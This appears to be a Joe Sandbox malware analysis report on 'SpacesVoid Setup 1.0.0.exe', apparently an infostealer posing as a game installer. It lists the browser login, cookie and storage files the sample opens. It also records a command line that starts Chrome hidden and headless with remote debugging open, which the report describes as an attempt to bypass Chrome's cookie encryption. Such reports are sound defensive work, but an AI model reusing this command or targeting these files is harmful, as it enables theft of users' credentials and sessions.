Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\webappsstore.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\content-prefs.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local Storage\leveldb	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\favicons.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite-wal	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\2918063365piupsah.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\3870112724rsegmnoittet-es.sqlite	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\storage\permanent\chrome\idb\1451318868ntouromlalnodry--epcr.sqlite	Jump to behavior

Remote Access Functionality

Attempt to bypass Chrome Application-Bound Encryption

Source: C:\Users\user\AppData\Local\Programs\unrealgame\SpacesVoid.exe

Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:/Program Files/Google/Chrome/Application/chrome.exe" --restore-last-session --remote-debugging-port=9184 --remote-allow-origins=* "--user-data-dir=C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory=Default --window-position=-32000,-32000 --headless https://mail.google.com

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	211 Windows Management Instrumentation	1 Windows Service	1 Windows Service	11 Masquerading	1 OS Credential Dumping	21 Security Software Discovery	Remote Services	11 Input Capture	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	1 Command and Scripting Interpreter	1 Registry Run Keys / Startup Folder	12 Process Injection	11 Disable or Modify Tools	11 Input Capture	3 Process Discovery	Remote Desktop Protocol	1 Data from Local System	1 Remote Access Software	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	1 DLL Side-Loading	1 Registry Run Keys / Startup Folder	121 Virtualization/Sandbox Evasion	Security Account Manager	121 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	12 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Extra Window Memory Injection	1 DLL Side-Loading	LSA Secrets	1 Remote System Discovery	SSH	Keylogging	4 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Extra Window Memory Injection	Cached Domain Credentials	2 File and Directory Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	Compile After Delivery	DCSync	34 System Information Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report SpacesVoid Setup 1.0.0.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

DDoS

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
SpacesVoid Setup 1.0.0.exe